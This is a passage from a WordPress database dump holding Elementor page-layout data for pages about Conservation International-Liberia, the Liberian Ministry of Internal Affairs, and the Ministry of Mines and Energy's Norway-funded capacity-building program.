Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9b3912\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9b6c777\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c8fb205\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9501,1656,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:22:\"typography_font_family\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(9502,1656,'_elementor_edit_mode','builder'),(9503,1656,'_elementor_template_type','wp-post'),(9504,1656,'_elementor_version','2.7.5'),(9505,1656,'_wp_page_template','default'),(9506,1656,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"CI Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ec2e5d0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e82f88c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"7c7b495\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"31a9954\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68c504b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"217b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"90753bc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9507,1657,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9508,1657,'_elementor_edit_mode','builder'),(9509,1657,'_elementor_template_type','wp-post'),(9510,1657,'_elementor_version','2.7.5'),(9511,1657,'_wp_page_template','default'),(9512,1657,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5da8f24\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7382d6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2075f5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4a557f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06bb2ab\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"91f39bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"059c488\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9513,1658,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9514,1658,'_elementor_edit_mode','builder'),(9515,1658,'_elementor_template_type','wp-post'),(9516,1658,'_elementor_version','2.7.5'),(9517,1658,'_wp_page_template','default'),(9518,1658,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f9bdf80\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef5e727\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"73c163b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e600ccf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0a541c9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9306a61\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"92d6861\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9519,1659,'_elementor_edit